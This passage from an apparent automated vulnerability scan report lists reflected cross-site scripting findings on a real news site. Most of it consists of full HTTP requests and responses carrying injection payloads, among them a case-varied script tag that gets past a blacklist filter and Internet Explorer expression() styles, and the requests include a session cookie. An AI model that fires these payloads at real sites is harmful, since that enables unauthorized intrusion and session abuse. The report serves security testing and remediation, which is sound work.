This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newsletters/2c4a6'-alert(1)-'3095eedd6cc HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:42 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:42 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30426
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Newsletters_Welcome_Ad_1x1;key=/newsletters/2c4a6'-alert(1)-'3095eedd6cc;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=820673269;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93a86'-alert(1)-'df28b1dcacc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newsletters/subscribe.jhtml93a86'-alert(1)-'df28b1dcacc HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:14 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:14 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30564
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Newsletters_Welcome_Ad_1x1;key=/newsletters/subscribe93a86'-alert(1)-'df28b1dcacc;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=146578575;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d96c7"%20style%3dx%3aexpr/**/ession(alert(1))%2037b2e1b4505 was submitted in the REST URL parameter 1. This input was echoed as d96c7" style=x:expr/**/ession(alert(1)) 37b2e1b4505 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /take.jhtmld96c7"%20style%3dx%3aexpr/**/ession(alert(1))%2037b2e1b4505 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:01 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:01 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30195
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/taked96c7" style=x:expr/**/ession(alert(1)) 37b2e1b4505;kvarticleid=;kvauthor=;loc=300;grp=530466894" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 751d6'-alert(1)-'0a15a6cfe4b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /take.jhtml751d6'-alert(1)-'0a15a6cfe4b HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:03 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:03 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 29832
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/take751d6'-alert(1)-'0a15a6cfe4b;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=354757675;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1bdf8</ScRiPt%20><script>alert(1)</script>6ff2fa07d8 was submitted in the REST URL parameter 2. This input was echoed as 1bdf8</ScRiPt ><script>alert(1)</script>6ff2fa07d8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /video/1bdf8</ScRiPt%20><script>alert(1)</script>6ff2fa07d8/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:28 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:28 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30451
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/video/1bdf8</ScRiPt ><script>alert(1)</script>6ff2fa07d8/;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=241780941;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 313cf"%20style%3dx%3aexpr/**/ession(alert(1))%20c408225f0d4 was submitted in the REST URL parameter 2. This input was echoed as 313cf" style=x:expr/**/ession(alert(1)) c408225f0d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /video/313cf"%20style%3dx%3aexpr/**/ession(alert(1))%20c408225f0d4/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:22 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:22 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30525
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/video/313cf" style=x:expr/**/ession(alert(1)) c408225f0d4/;kvarticleid=;kvauthor=;loc=300;grp=138397715" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 537b8"%20style%3dx%3aexpression(alert(1))%20071df3067fb was submitted in the REST URL parameter 1. This input was echoed as 537b8" style=x:expression(alert(1)) 071df3067fb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /537b8"%20style%3dx%3aexpression(alert(1))%20071df3067fb/security/20464495001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:56 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:56 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30787
<!-- <DROPLET SRC="nopagefound.jhtml"></DROPLET> --> <!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var fo ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/537b8" style=x:expression(alert(1)) 071df3067fb/security/2;kvarticleid=;kvauthor=;loc=300;grp=38540052" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c16f3'-alert(1)-'13ba2423412 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c16f3'-alert(1)-'13ba2423412/security/20464495001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:58 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:58 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30622
<!-- <DROPLET SRC="nopagefound.jhtml"></DROPLET> --> <!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var fo ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/c16f3'-alert(1)-'13ba2423412/security/20464495001;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=486580146;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e78f"><script>alert(1)</script>8dfee8c03fc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /video/3e78f"><script>alert(1)</script>8dfee8c03fc/20464495001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:22:03 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:03 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 35484
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/video/3e78f"><script>alert(1)</script>8dfee8c03fc/20464495;kvarticleid=;kvauthor=;loc=300;grp=194178644" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbf24'-alert(1)-'c2d2cd2f22c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/dbf24'-alert(1)-'c2d2cd2f22c/20464495001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:22:04 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:04 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 93448
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/video/dbf24'-alert(1)-'c2d2cd2f22c/20464495001;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=818048985;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54b38'-alert(1)-'15242bb4563 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/security/54b38'-alert(1)-'15242bb4563 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:20 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:20 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30573
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/video/security/54b38'-alert(1)-'15242bb4563;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=972311011;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94a06"a%3d"b"69c28fb7c6b was submitted in the REST URL parameter 3. This input was echoed as 94a06"a="b"69c28fb7c6b in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/security/94a06"a%3d"b"69c28fb7c6b HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:16 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:16 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30541
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/video/security/94a06"a="b"69c28fb7c6b;kvarticleid=;kvauthor=;loc=300;grp=180057014" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ae42"style%3d"x%3aexpression(alert(1))"7f51aa4d9f2 was submitted in the REST URL parameter 2. This input was echoed as 2ae42"style="x:expression(alert(1))"7f51aa4d9f2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /video/2ae42"style%3d"x%3aexpression(alert(1))"7f51aa4d9f2/20979809001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:22:09 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:09 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 93766
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/video/2ae42"style="x:expression(alert(1))"7f51aa4d9f2/2097;kvarticleid=;kvauthor=;loc=300;grp=385361240" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b5ec</script>e4b85e9dcc5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/1b5ec</script>e4b85e9dcc5/20979809001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:22:12 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:12 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 93374
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/video/1b5ec</script>e4b85e9dcc5/20979809001;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=262056879;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aab2a'-alert(1)-'3150d050d55 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
